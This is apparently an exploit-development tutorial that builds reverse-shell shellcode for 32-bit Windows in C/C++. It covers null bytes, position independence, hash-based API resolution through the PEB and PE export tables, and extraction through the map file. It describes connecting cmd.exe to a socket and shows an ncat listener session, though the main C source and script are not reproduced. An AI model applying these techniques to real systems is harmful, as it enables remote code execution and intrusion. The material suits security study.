Introduction

A shellcode is a piece of code which is sent as payload by an exploit, injected into the vulnerable application and then executed. A shellcode must be position independent, i.e. it must work no matter where it is located in memory, and it shouldn’t contain null bytes, because the shellcode is usually copied by functions like strcpy() which stop copying when they encounter a null byte. If a shellcode contained a null byte, those functions would copy it only up to the first null byte and the shellcode would be incomplete.
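
The following tiny Python model makes the null-byte problem concrete. It shows what a strcpy()-style copy does to a payload and adds a check that lists the offending offsets. The helper names are hypothetical and are not part of the script discussed later:

```python
def strcpy_like(src: bytes) -> bytes:
    """Model of strcpy(): copy bytes up to (not including) the first 0x00."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]


def null_byte_offsets(shellcode: bytes) -> list[int]:
    """Return the offset of every 0x00 byte in the shellcode."""
    return [i for i, b in enumerate(shellcode) if b == 0]


# E8 00 00 00 00 is "CALL $+5": it contains four null bytes.
payload = bytes.fromhex("90 90 E8 00 00 00 00 5F")
print(null_byte_offsets(payload))   # [3, 4, 5, 6]
print(strcpy_like(payload).hex())   # 9090e8 (the copy stops inside the CALL)
```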

Shellcode is usually written directly in assembly, but this doesn’t need to be the case. In this section, we’ll develop shellcode in C/C++ using Visual Studio 2013. The benefits are evident:

  1. shorter development times
  2. IntelliSense
  3. ease of debugging

We will use VS 2013 to produce an executable file containing our shellcode. Then we will extract and fix the shellcode with a Python script, i.e. handle its references to strings and remove the null bytes.

C/C++ code

Use only stack variables

To write position independent code in C/C++ we must use only variables allocated on the stack. This means that we can’t allocate an array with new (e.g. new char[100]), because that array would be allocated on the heap. More importantly, this would try to call the new operator function from msvcr120.dll using an absolute address:

00191000 6A 64                push        64h
00191002 FF 15 90 20 19 00    call        dword ptr ds:[192090h]

The location 192090h contains the address of the function.

If we want to call a function imported from a library, we must do so directly, without relying on import tables and the Windows loader.

Another problem is that the new operator probably requires some kind of initialization performed by the C/C++ runtime library (CRT). We don’t want to include all that in our shellcode.

We can’t use global variables either. If x is a global variable, an assignment such as x = 12; (if not optimized out) produces

008E1C7E C7 05 30 91 8E 00 0C 00 00 00 mov         dword ptr ds:[8E9130h],0Ch

where 8E9130h is the absolute address of the variable x.

Strings pose a problem. Suppose we declare a local char array initialized with a string literal (e.g. char str[] = "I’m a string";) and pass str to printf. In that case the string will be put into the .rdata section of the executable and will be referenced with an absolute address. You must not use printf in your shellcode: this is just an example to see how str is referenced. Here’s the asm code:

00A71006 8D 45 F0             lea         eax,[str]
00A71009 56                   push        esi
00A7100A 57                   push        edi
00A7100B BE 00 21 A7 00       mov         esi,0A72100h
00A71010 8D 7D F0             lea         edi,[str]
00A71013 50                   push        eax
00A71014 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71015 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71016 A5                   movs        dword ptr es:[edi],dword ptr [esi]
00A71017 A4                   movs        byte ptr es:[edi],byte ptr [esi]
00A71018 FF 15 90 20 A7 00    call        dword ptr ds:[0A72090h]

As you can see, the string, located at the address A72100h in the .rdata section, is copied onto the stack (str points to the stack) through movsd and movsb. Note that A72100h is an absolute address. This code is definitely not position independent.

If we use a pointer instead (e.g. char *str = "I’m a string";), the string is still put into the .rdata section, but it’s not copied onto the stack:

00A31000 68 00 21 A3 00       push        0A32100h
00A31005 FF 15 90 20 A3 00    call        dword ptr ds:[0A32090h]

The absolute position of the string in .rdata is A32100h.
How can we make this code position independent?
The simplest (partial) solution is rather cumbersome: initialize the char array character by character instead of with a string literal.

Here’s the asm code:

012E1006 8D 45 F0             lea         eax,[str]
012E1009 C7 45 F0 49 27 6D 20 mov         dword ptr [str],206D2749h
012E1010 50                   push        eax
012E1011 C7 45 F4 61 20 73 74 mov         dword ptr [ebp-0Ch],74732061h
012E1018 C7 45 F8 72 69 6E 67 mov         dword ptr [ebp-8],676E6972h
012E101F C6 45 FC 00          mov         byte ptr [ebp-4],0
012E1023 FF 15 90 20 2E 01    call        dword ptr ds:[12E2090h]

Except for the call to printf, this code is position independent because portions of the string are coded directly in the source operands of the mov instructions. Once the string has been built on the stack, it can be used.
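
The immediates in the listing above are simply the bytes of "I’m a string", plus its terminator, read as little-endian DWORDs. This short Python sketch reproduces them. string_to_immediates is a hypothetical helper:

```python
import struct


def string_to_immediates(s: str) -> tuple[list[int], bytes]:
    """Split a null-terminated ASCII string into little-endian DWORD immediates.

    Returns the DWORDs (one per 'mov dword ptr [...], imm32') and the
    leftover bytes (fewer than 4, terminator included) stored with smaller movs.
    """
    data = s.encode("ascii") + b"\x00"
    full = len(data) // 4 * 4
    dwords = [struct.unpack_from("<I", data, i)[0] for i in range(0, full, 4)]
    return dwords, data[full:]


dwords, tail = string_to_immediates("I'm a string")
print([hex(d) for d in dwords])  # ['0x206d2749', '0x74732061', '0x676e6972']
print(tail)                      # b'\x00'
```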

Unfortunately, when the string is longer, this method doesn’t work anymore. In fact, initializing a longer array character by character produces

013E1006 66 0F 6F 05 00 21 3E 01 movdqa      xmm0,xmmword ptr ds:[13E2100h]
013E100E 8D 45 E8             lea         eax,[str]
013E1011 50                   push        eax
013E1012 F3 0F 7F 45 E8       movdqu      xmmword ptr [str],xmm0
013E1017 C7 45 F8 73 74 72 69 mov         dword ptr [ebp-8],69727473h
013E101E 66 C7 45 FC 6E 67    mov         word ptr [ebp-4],676Eh
013E1024 C6 45 FE 00          mov         byte ptr [ebp-2],0
013E1028 FF 15 90 20 3E 01    call        dword ptr ds:[13E2090h]

As you can see, part of the string is located in the .rdata section at the address 13E2100h, while other parts of the string are encoded in the source operands of the mov instructions like before.

The solution I came up with is to allow code that refers to strings stored in .rdata, as in the examples above, and fix the shellcode with a Python script. That script needs to extract the referenced strings from the .rdata section, put them into the shellcode and fix the relocations. We’ll see how shortly.

Don’t call Windows API directly

We can’t call WaitForSingleObject directly in our C/C++ code because it needs to be imported from kernel32.dll.

The process of importing a function from a library is rather complex. In a nutshell, the PE file contains an import table and an import address table (IAT). The import table contains information about which functions to import from which libraries. The IAT is filled in by the Windows loader when the executable is loaded and contains the addresses of the imported functions. The code of the executable calls the imported functions through a level of indirection. For example:

 001D100B FF 15 94 20 1D 00    call        dword ptr ds:[1D2094h]

The address 1D2094h is the location of the entry (in the IAT) which contains the address of the function MessageBoxA. This level of indirection is useful because the call above doesn’t need to be fixed (unless the executable is relocated). The only thing the Windows loader needs to fix is the dword at 1D2094h, which is the address of the MessageBoxA function.

The solution is to get the addresses of the Windows functions directly from the in-memory data structures of Windows. We’ll see how this is done later.

Install VS 2013 CTP

First of all, download and install the Visual C++ Compiler November 2013 CTP.

Create a New Project

Go to File > New > Project…, select Installed > Templates > Visual C++ > Win32 > Win32 Console Application, choose a name for the project (I chose shellcode) and hit OK.

Go to Project > <project name> Properties and a new dialog will appear. Apply the changes to all configurations (Release and Debug) by setting Configuration (top left of the dialog) to All Configurations. Then, expand Configuration Properties and under General modify Platform Toolset so that it says Visual C++ Compiler Nov 2013 CTP (CTP_Nov2013). This way you’ll be able to use some features of C++11 and C++14 like static_assert.

Example of Shellcode

Here’s the code for a simple reverse shell. Add a file named shellcode.cpp to the project and copy this code into it. Don’t try to understand all the code right now. We’ll discuss it at length.

Compiler Configuration

Go to Project > <project name> Properties, expand Configuration Properties and then C/C++. Apply the changes to the Release configuration.

Here are the settings you need to change:

  • General:
    • SDL Checks: No (/sdl-)
      Maybe this is not needed, but I disabled them anyway.
  • Optimization:
    • Optimization: Minimize Size (/O1)
      This is very important! We want a shellcode as small as possible.
    • Inline Function Expansion: Only __inline (/Ob1)
      If a function A calls a function B and B is inlined, then the call to B is replaced with the code of B itself. With this setting we tell VS 2013 to inline only functions decorated with __inline.
      This is critical! main() just calls the entryPoint function of our shellcode. If the entryPoint function is short, it might be inlined into main(). This would be disastrous because main() wouldn’t indicate the end of our shellcode anymore (in fact, it would contain part of it). We’ll see why this is important later.
    • Enable Intrinsic Functions: Yes (/Oi)
      I don’t know if this should be disabled.
    • Favor Size Or Speed: Favor small code (/Os)
    • Whole Program Optimization: Yes (/GL)
  • Code Generation:
    • Security Check: Disable Security Check (/GS-)
      We don’t need any security checks!
    • Enable Function-Level linking: Yes (/Gy)

Linker Configuration

Go to Project > <project name> Properties, expand Configuration Properties and then Linker. Apply the changes to the Release configuration. Here are the settings you need to change:

  • General:
    • Enable Incremental Linking: No (/INCREMENTAL:NO)
  • Debugging:
    • Generate Map File: Yes (/MAP)
      Tells the linker to generate a map file containing the structure of the EXE.
    • Map File Name: mapfile
      This is the name of the map file. Choose whatever name you like.
  • Optimization:
    • References: Yes (/OPT:REF)
      This is very important to generate a small shellcode because it eliminates functions and data that are never referenced by the code.
    • Enable COMDAT Folding: Yes (/OPT:ICF)
    • Function Order: function_order.txt
      This reads a file called function_order.txt which specifies the order in which the functions must appear in the code section. We want the function entryPoint to be the first function in the code section so my function_order.txt contains just a single line with the word ?entryPoint@@YAHXZ. You can find the names of the functions in the map file.

getProcAddrByHash

This function returns the address of a function exported by a module (.exe or .dll) present in memory, given the hash associated with the module and the function. It’s certainly possible to find functions by name, but that would waste considerable space because those names would have to be included in the shellcode. A hash, on the other hand, is only 4 bytes. Since we use a single hash rather than two (one for the module and one for the function), getProcAddrByHash needs to consider all the modules loaded in memory.

The hash for MessageBoxA, exported by user32.dll, is the sum of getHash(“user32.dll”) and getHash(“MessageBoxA”). The implementation of getHash is very simple:

As you can see, the hash is case-insensitive. This is important because in some versions of Windows the names in memory are all uppercase.
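
The original getHash isn’t reproduced in this text. As an illustration only, here is a Python model of a common choice: a case-insensitive rotate-right-by-13 (ROR-13) hash. The algorithm is an assumption, so generate your constants with the same getHash your shellcode actually uses. The combined hash wraps to 32 bits, as a C DWORD sum would:

```python
MASK32 = 0xFFFFFFFF


def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    value &= MASK32
    return ((value >> count) | (value << (32 - count))) & MASK32


def get_hash(name: str) -> int:
    """ASSUMED algorithm: case-insensitive ROR-13 hash (illustration only)."""
    h = 0
    for ch in name:
        c = ord(ch)
        if ord("a") <= c <= ord("z"):
            c -= 32                      # fold lowercase to uppercase
        h = (ror32(h, 13) + c) & MASK32
    return h


def get_func_hash(module: str, function: str) -> int:
    """Module hash + function hash, wrapped to 32 bits like a DWORD."""
    return (get_hash(module) + get_hash(function)) & MASK32


print(get_hash("user32.dll") == get_hash("USER32.DLL"))  # True
print(hex(get_func_hash("user32.dll", "MessageBoxA")))
```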

First, getProcAddrByHash gets the address of the TEB (Thread Environment Block):

where

The selector fs is associated with a segment which starts at the address of the TEB. At offset 30h, the TEB contains a pointer to the PEB (Process Environment Block). We can see this in WinDbg:

0:000> dt _TEB @$teb
ntdll!_TEB
+0x000 NtTib            : _NT_TIB
+0x01c EnvironmentPointer : (null)
+0x020 ClientId         : _CLIENT_ID
+0x028 ActiveRpcHandle  : (null)
+0x02c ThreadLocalStoragePointer : 0x7efdd02c Void
+0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB
+0x034 LastErrorValue   : 0
+0x038 CountOfOwnedCriticalSections : 0
+0x03c CsrClientThread  : (null)
<snip>

The PEB, as the name implies, is associated with the current process and contains, among other things, information about the modules loaded into the process address space.

Here’s getProcAddrByHash again:

Here’s part of the PEB:

0:000> dt _PEB @$peb
ntdll!_PEB
   +0x000 InheritedAddressSpace : 0 ''
   +0x001 ReadImageFileExecOptions : 0 ''
   +0x002 BeingDebugged    : 0x1 ''
   +0x003 BitField         : 0x8 ''
   +0x003 ImageUsesLargePages : 0y0
   +0x003 IsProtectedProcess : 0y0
   +0x003 IsLegacyProcess  : 0y0
   +0x003 IsImageDynamicallyRelocated : 0y1
   +0x003 SkipPatchingUser32Forwarders : 0y0
   +0x003 SpareBits        : 0y000
   +0x004 Mutant           : 0xffffffff Void
   +0x008 ImageBaseAddress : 0x00060000 Void
   +0x00c Ldr              : 0x76fd0200 _PEB_LDR_DATA
   +0x010 ProcessParameters : 0x00681718 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData    : (null)
   +0x018 ProcessHeap      : 0x00680000 Void
   <snip>

At offset 0Ch, there is a field called Ldr which points to a PEB_LDR_DATA data structure. Let’s see that in WinDbg:

0:000> dt _PEB_LDR_DATA 0x76fd0200
ntdll!_PEB_LDR_DATA
   +0x000 Length           : 0x30
   +0x004 Initialized      : 0x1 ''
   +0x008 SsHandle         : (null)
   +0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]
   +0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x683120 - 0x6862d0 ]
   +0x024 EntryInProgress  : (null)
   +0x028 ShutdownInProgress : 0 ''
   +0x02c ShutdownThreadId : (null)

InMemoryOrderModuleList is a doubly-linked list of LDR_DATA_TABLE_ENTRY structures associated with the modules loaded in the current process’s address space. To be precise, InMemoryOrderModuleList is a LIST_ENTRY, which contains two fields:

0:000> dt _LIST_ENTRY
ntdll!_LIST_ENTRY
   +0x000 Flink            : Ptr32 _LIST_ENTRY
   +0x004 Blink            : Ptr32 _LIST_ENTRY

Flink means forward link and Blink backward link. Flink points to the LDR_DATA_TABLE_ENTRY of the first module. Well, not exactly: Flink points to a LIST_ENTRY structure contained in the structure LDR_DATA_TABLE_ENTRY.

Let’s see how LDR_DATA_TABLE_ENTRY is defined:

0:000> dt _LDR_DATA_TABLE_ENTRY
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY
   +0x008 InMemoryOrderLinks : _LIST_ENTRY
   +0x010 InInitializationOrderLinks : _LIST_ENTRY
   +0x018 DllBase          : Ptr32 Void
   +0x01c EntryPoint       : Ptr32 Void
   +0x020 SizeOfImage      : Uint4B
   +0x024 FullDllName      : _UNICODE_STRING
   +0x02c BaseDllName      : _UNICODE_STRING
   +0x034 Flags            : Uint4B
   +0x038 LoadCount        : Uint2B
   +0x03a TlsIndex         : Uint2B
   +0x03c HashLinks        : _LIST_ENTRY
   +0x03c SectionPointer   : Ptr32 Void
   +0x040 CheckSum         : Uint4B
   +0x044 TimeDateStamp    : Uint4B
   +0x044 LoadedImports    : Ptr32 Void
   +0x048 EntryPointActivationContext : Ptr32 _ACTIVATION_CONTEXT
   +0x04c PatchInformation : Ptr32 Void
   +0x050 ForwarderLinks   : _LIST_ENTRY
   +0x058 ServiceTagLinks  : _LIST_ENTRY
   +0x060 StaticLinks      : _LIST_ENTRY
   +0x068 ContextInformation : Ptr32 Void
   +0x06c OriginalBase     : Uint4B
   +0x070 LoadTime         : _LARGE_INTEGER

InMemoryOrderModuleList.Flink points to _LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks which is at offset 8, so we must subtract 8 to get the address of _LDR_DATA_TABLE_ENTRY.
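
The pointer arithmetic is easy to get wrong, so here’s a Python model of walking InMemoryOrderModuleList. It’s only a simulation: memory is a dict of DWORDs, and the second entry’s address and DllBase are made up. The list is circular, so the Flink of the last entry points back to the list head inside PEB_LDR_DATA. That is how the walk knows when to stop:

```python
LDR_IN_MEMORY_ORDER_LIST = 0x14   # PEB_LDR_DATA.InMemoryOrderModuleList
IN_MEMORY_ORDER_LINKS = 0x08      # LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks
DLL_BASE = 0x18                   # LDR_DATA_TABLE_ENTRY.DllBase


def walk_modules(memory: dict[int, int], ldr: int) -> list[int]:
    """Return the DllBase of every module, following Flink pointers.

    `memory` maps 32-bit addresses to DWORD values (simulated process memory).
    """
    head = ldr + LDR_IN_MEMORY_ORDER_LIST
    bases = []
    flink = memory[head]                        # head.Flink
    while flink != head:                        # circular list: stop at the head
        entry = flink - IN_MEMORY_ORDER_LINKS   # back to the start of the entry
        bases.append(memory[entry + DLL_BASE])
        flink = memory[flink]                   # InMemoryOrderLinks.Flink
    return bases


# Simulated memory: two entries (the second one is made up).
ldr = 0x76FD0200
exe_entry, dll_entry = 0x683080, 0x683110
head = ldr + LDR_IN_MEMORY_ORDER_LIST
memory = {
    head: exe_entry + IN_MEMORY_ORDER_LINKS,
    exe_entry + IN_MEMORY_ORDER_LINKS: dll_entry + IN_MEMORY_ORDER_LINKS,
    exe_entry + DLL_BASE: 0x00060000,
    dll_entry + IN_MEMORY_ORDER_LINKS: head,    # last Flink points back to head
    dll_entry + DLL_BASE: 0x77000000,
}
print([hex(b) for b in walk_modules(memory, ldr)])  # ['0x60000', '0x77000000']
```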

First, let’s get the Flink pointer of InMemoryOrderModuleList. Don’t use the one of InLoadOrderModuleList, which points to offset 0 of the entry rather than to InMemoryOrderLinks:

+0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]

Its value is 0x683088, so the _LDR_DATA_TABLE_ENTRY structure is at address 0x683088 - 8 = 0x683080. The dump below was taken at 683078 instead, i.e. the Flink of InLoadOrderModuleList (0x683080) minus 8. Since that Flink already points to the start of the entry, the dump starts 8 bytes too early and every field appears shifted by 8 bytes:

0:000> dt _LDR_DATA_TABLE_ENTRY 683078
ntdll!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x359469e5 - 0x1800eeb1 ]
   +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x683110 - 0x76fd020c ]
   +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x683118 - 0x76fd0214 ]
   +0x018 DllBase          : (null)
   +0x01c EntryPoint       : (null)
   +0x020 SizeOfImage      : 0x60000
   +0x024 FullDllName      : _UNICODE_STRING "蒮m쿟ᄍ엘ᆲ膪n???"
   +0x02c BaseDllName      : _UNICODE_STRING "C:\Windows\SysWOW64\calc.exe"
   +0x034 Flags            : 0x120010
   +0x038 LoadCount        : 0x2034
   +0x03a TlsIndex         : 0x68
   +0x03c HashLinks        : _LIST_ENTRY [ 0x4000 - 0xffff ]
   +0x03c SectionPointer   : 0x00004000 Void
   +0x040 CheckSum         : 0xffff
   +0x044 TimeDateStamp    : 0x6841b4
   +0x044 LoadedImports    : 0x006841b4 Void
   +0x048 EntryPointActivationContext : 0x76fd4908 _ACTIVATION_CONTEXT
   +0x04c PatchInformation : 0x4ce7979d Void
   +0x050 ForwarderLinks   : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x6830d0 - 0x6830d0 ]
   +0x060 StaticLinks      : _LIST_ENTRY [ 0x6830d8 - 0x6830d8 ]
   +0x068 ContextInformation : 0x00686418 Void
   +0x06c OriginalBase     : 0x6851a8
   +0x070 LoadTime         : _LARGE_INTEGER 0x76f0c9d0

As you can see, I’m debugging calc.exe in WinDbg! That’s right: the first module is the executable itself. Because of the 8-byte shift, the value shown as SizeOfImage (0x60000) is actually DllBase, which matches ImageBaseAddress in the PEB. Likewise, the path shown as BaseDllName is actually FullDllName. The important field is DllBase. Given the base address of the module, we can analyze the PE file loaded in memory and get all kinds of information, like the addresses of the exported functions.

That’s exactly what we do in getProcAddrByHash:

To understand this piece of code you’ll need to have a look at the PE file format specification. I won’t go into too many details. One important thing you should know is that many (if not all) of the addresses in the PE file structures are RVAs (Relative Virtual Addresses), i.e. addresses relative to the base address of the PE module (DllBase). For example, if the RVA is 100h and DllBase is 400000h, then the RVA points to data at the address 400000h + 100h = 400100h.

The module starts with the so-called DOS_HEADER, which contains an RVA (e_lfanew) to the NT_HEADERS. These consist of a signature followed by the FILE_HEADER and the OPTIONAL_HEADER. The OPTIONAL_HEADER contains an array called DataDirectory which points to various “directories” of the PE module. We are interested in the Export Directory.
The C structure associated with the Export Directory is defined as follows:

The field Name is an RVA to a string containing the name of the module. Then there are 5 important fields:

  • NumberOfFunctions:
    number of elements in AddressOfFunctions.
  • NumberOfNames:
    number of elements in AddressOfNames.
  • AddressOfFunctions:
    RVA to an array of RVAs (DWORDs) to the entrypoints of the exported functions.
  • AddressOfNames:
    RVA to an array of RVAs (DWORDs) to the names of the exported functions.
  • AddressOfNameOrdinals:
    RVA to an array of ordinals (WORDs) associated with the exported functions.
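
The Python function below sketches how the Export Directory is reached from DllBase. It works on a bytes buffer holding a 32-bit (PE32) image as mapped in memory, so buffer offsets are RVAs. The field layout follows IMAGE_EXPORT_DIRECTORY in winnt.h. The function name is hypothetical. PE32+ (64-bit) images, whose DataDirectory sits at a different offset, are deliberately rejected:

```python
import struct

# IMAGE_EXPORT_DIRECTORY (winnt.h): 40 bytes, little-endian
EXPORT_DIR = struct.Struct("<IIHHIIIIIII")
FIELDS = ("Characteristics", "TimeDateStamp", "MajorVersion", "MinorVersion",
          "Name", "Base", "NumberOfFunctions", "NumberOfNames",
          "AddressOfFunctions", "AddressOfNames", "AddressOfNameOrdinals")


def read_export_directory(image: bytes) -> dict:
    """Decode the Export Directory of a PE32 image mapped at offset 0 (DllBase)."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]   # DOS header -> NT headers
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    optional = e_lfanew + 4 + 20                          # skip Signature + FILE_HEADER
    if struct.unpack_from("<H", image, optional)[0] != 0x10B:
        raise ValueError("not a PE32 image")
    # In a PE32 OPTIONAL_HEADER, DataDirectory starts at offset 96; entry 0 = exports
    export_rva, _size = struct.unpack_from("<II", image, optional + 96)
    return dict(zip(FIELDS, EXPORT_DIR.unpack_from(image, export_rva)))


# Synthetic image with made-up values, just to exercise the parser
img = bytearray(0x200)
struct.pack_into("<I", img, 0x3C, 0x80)                   # e_lfanew
img[0x80:0x84] = b"PE\x00\x00"
struct.pack_into("<H", img, 0x80 + 24, 0x10B)             # OPTIONAL_HEADER.Magic
struct.pack_into("<II", img, 0x80 + 24 + 96, 0x100, EXPORT_DIR.size)
EXPORT_DIR.pack_into(img, 0x100, 0, 0, 0, 0, 0x150, 1, 3, 2, 0x160, 0x170, 0x180)
exports = read_export_directory(bytes(img))
print(exports["NumberOfFunctions"], exports["NumberOfNames"])  # 3 2
```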

As the comments in the C/C++ code say, the arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th name corresponds to the i-th ordinal. The third array, AddressOfFunctions, doesn’t run in parallel with them: the ordinals taken from AddressOfNameOrdinals are indices into AddressOfFunctions.

So the idea is to first find the right name in AddressOfNames, then get the corresponding ordinal in AddressOfNameOrdinals (at the same position) and finally use the ordinal as index in AddressOfFunctions to get the RVA of the corresponding exported function.
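
Here’s the same lookup on toy arrays that have already been decoded. The names and RVAs are made up and the function name is hypothetical. getProcAddrByHash compares hashes rather than names, but the indexing is identical:

```python
def find_export_rva(names, name_ordinals, function_rvas, wanted):
    """Resolve an exported name to its function RVA, or return None.

    names and name_ordinals run in parallel (same index); the ordinal
    is then used as an index into function_rvas (AddressOfFunctions).
    """
    for i, name in enumerate(names):
        if name == wanted:
            return function_rvas[name_ordinals[i]]
    return None


names = ["Alpha", "Beta", "Gamma"]          # AddressOfNames (made up)
name_ordinals = [2, 0, 1]                   # AddressOfNameOrdinals (made up)
function_rvas = [0x1000, 0x2000, 0x3000]    # AddressOfFunctions (made up)
print(hex(find_export_rva(names, name_ordinals, function_rvas, "Alpha")))  # 0x3000
```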

DefineFuncPtr

DefineFuncPtr is a handy macro which helps define a pointer to an imported function. Here’s an example:

WSAStartup is a function imported from ws2_32.dll, so HASH_WSAStartup is computed this way:

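When the macro is expanded, its invocation for WSAStartup becomes the definition of a pointer named My_WSAStartup. The pointer’s type is decltype(WSAStartup) *, and it is initialized with the address that getProcAddrByHash returns for HASH_WSAStartup. Here decltype(WSAStartup) is the type of the function WSAStartup, so we don’t need to redefine the function prototype. Note that decltype was introduced in C++11.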

Now we can call WSAStartup through My_WSAStartup and IntelliSense will work perfectly.

Note that before importing a function from a module, we need to make sure that that module is already loaded in memory. While kernel32.dll and ntdll.dll are always present (lucky for us), we can’t assume that other modules are. The easiest way to load a module is to use LoadLibrary:

This works because LoadLibrary is imported from kernel32.dll, which, as we said, is always present in memory.

We could also import GetProcAddress and use it to get the addresses of all the other functions we need, but that would be wasteful because we would need to include the full names of the functions in the shellcode.

entryPoint

entryPoint is obviously the entry point of our shellcode and implements the reverse shell. First, we import all the functions we need and then we use them. The details are not important, and I must say that the Winsock API is very cumbersome to use.

In a nutshell:

  1. we create a socket,
  2. connect the socket to 127.0.0.1:123,
  3. create a process by executing cmd.exe,
  4. attach the socket to the standard input, output and error of the process,
  5. wait for the process to terminate,
  6. when the process has ended, we terminate the current thread.

Points 3 and 4 are performed at the same time with a call to CreateProcess. Thanks to point 4, the attacker can listen on port 123 for a connection. Once connected, the attacker can interact through the socket (i.e. the TCP connection) with cmd.exe running on the remote machine.

To try this out, install ncat, run cmd.exe and at the prompt enter

ncat -lvp 123

This will start listening on port 123.
Then, back in Visual Studio 2013, select Release, build the project and run it.

Go back to ncat and you should see something like the following:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm>ncat -lvp 123
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Listening on :::123
Ncat: Listening on 0.0.0.0:123
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:4409.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm\documents\visual studio 2013\Projects\shellcode\shellcode>

Now you can type whatever command you want. To exit, type exit.

main

Thanks to the linker option

Function Order: function_order.txt

where the first and only line of function_order.txt is ?entryPoint@@YAHXZ, the function entryPoint will be positioned first in our shellcode. This is what we want.

It seems that the linker honors the order of the functions in the source code, so we could have put entryPoint before any other function, but I didn’t want to mess things up. The main function comes last in the source code so it’s linked at the end of our shellcode. This allows us to tell where the shellcode ends. We’ll see how in a moment when we talk about the map file.

Python script

Introduction

Now that the executable containing our shellcode is ready, we need a way to extract and fix the shellcode. This won’t be easy. I wrote a Python script that

  1. extracts the shellcode
  2. handles the relocations for the strings
  3. fixes the shellcode by removing null bytes

By the way, you can use whatever IDE you like, but I like and use PyCharm.

The script is only 392 lines long, but it’s a little tricky so I’ll explain it in detail.

Here’s the code:

Map file and shellcode length

We told the linker to produce a map file with the following options:

  • Debugging:
    • Generate Map File: Yes (/MAP)
      Tells the linker to generate a map file containing the structure of the EXE.
    • Map File Name: mapfile

The map file is important to determine the shellcode length.

Here’s the relevant part of the map file:

shellcode

 Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015)

 Preferred load address is 00400000

 Start         Length     Name                   Class
 0001:00000000 00000a9cH .text$mn                CODE
 0002:00000000 00000094H .idata$5                DATA
 0002:00000094 00000004H .CRT$XCA                DATA
 0002:00000098 00000004H .CRT$XCAA               DATA
 0002:0000009c 00000004H .CRT$XCZ                DATA
 0002:000000a0 00000004H .CRT$XIA                DATA
 0002:000000a4 00000004H .CRT$XIAA               DATA
 0002:000000a8 00000004H .CRT$XIC                DATA
 0002:000000ac 00000004H .CRT$XIY                DATA
 0002:000000b0 00000004H .CRT$XIZ                DATA
 0002:000000c0 000000a8H .rdata                  DATA
 0002:00000168 00000084H .rdata$debug            DATA
 0002:000001f0 00000004H .rdata$sxdata           DATA
 0002:000001f4 00000004H .rtc$IAA                DATA
 0002:000001f8 00000004H .rtc$IZZ                DATA
 0002:000001fc 00000004H .rtc$TAA                DATA
 0002:00000200 00000004H .rtc$TZZ                DATA
 0002:00000208 0000005cH .xdata$x                DATA
 0002:00000264 00000000H .edata                  DATA
 0002:00000264 00000028H .idata$2                DATA
 0002:0000028c 00000014H .idata$3                DATA
 0002:000002a0 00000094H .idata$4                DATA
 0002:00000334 0000027eH .idata$6                DATA
 0003:00000000 00000020H .data                   DATA
 0003:00000020 00000364H .bss                    DATA
 0004:00000000 00000058H .rsrc$01                DATA
 0004:00000060 00000180H .rsrc$02                DATA

  Address         Publics by Value              Rva+Base       Lib:Object

 0000:00000000       ___guard_fids_table        00000000     <absolute>
 0000:00000000       ___guard_fids_count        00000000     <absolute>
 0000:00000000       ___guard_flags             00000000     <absolute>
 0000:00000001       ___safe_se_handler_count   00000001     <absolute>
 0000:00000000       ___ImageBase               00400000     <linker-defined>
 0001:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj
 0001:000001a1       ?getHash@@YAKPBD@Z         004011a1 f   shellcode.obj
 0001:000001be       ?getProcAddrByHash@@YAPAXK@Z 004011be f   shellcode.obj
 0001:00000266       _main                      00401266 f   shellcode.obj
 0001:000004d4       _mainCRTStartup            004014d4 f   MSVCRT:crtexe.obj
 0001:000004de       ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z 004014de f   MSVCRT:unhandld.obj
 0001:0000051f       ___CxxSetUnhandledExceptionFilter 0040151f f   MSVCRT:unhandld.obj
 0001:0000052e       __XcptFilter               0040152e f   MSVCRT:MSVCR120.dll
<snip>

The start of the map file tells us that section 1 is the .text section, which contains the code:

Start         Length     Name                   Class
0001:00000000 00000a9cH .text$mn                CODE

The second part tells us that the .text section starts with ?entryPoint@@YAHXZ, our entryPoint function, and that main (here called _main) is the last of our functions. Since main is at offset 0x266 and entryPoint is at 0, our shellcode starts at the beginning of the .text section and is 0x266 bytes long.
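
Here is a minimal sketch of the length computation in Python. It assumes the map file layout shown above and that entryPoint sits at offset 0 of section 0001, which is what function_order.txt guarantees. The function name is hypothetical, and the author’s script may parse the file differently:

```python
import re


def shellcode_length_from_map(map_text: str, section: str = "0001") -> int:
    """Return the offset of _main within `section` of an MSVC map file.

    The shellcode runs from offset 0 of .text (entryPoint) up to, but not
    including, main, so this offset is also the shellcode length.
    """
    pattern = re.compile(r"^\s*" + section + r":([0-9a-fA-F]+)\s+_main\s", re.MULTILINE)
    match = pattern.search(map_text)
    if match is None:
        raise ValueError("_main not found in map file")
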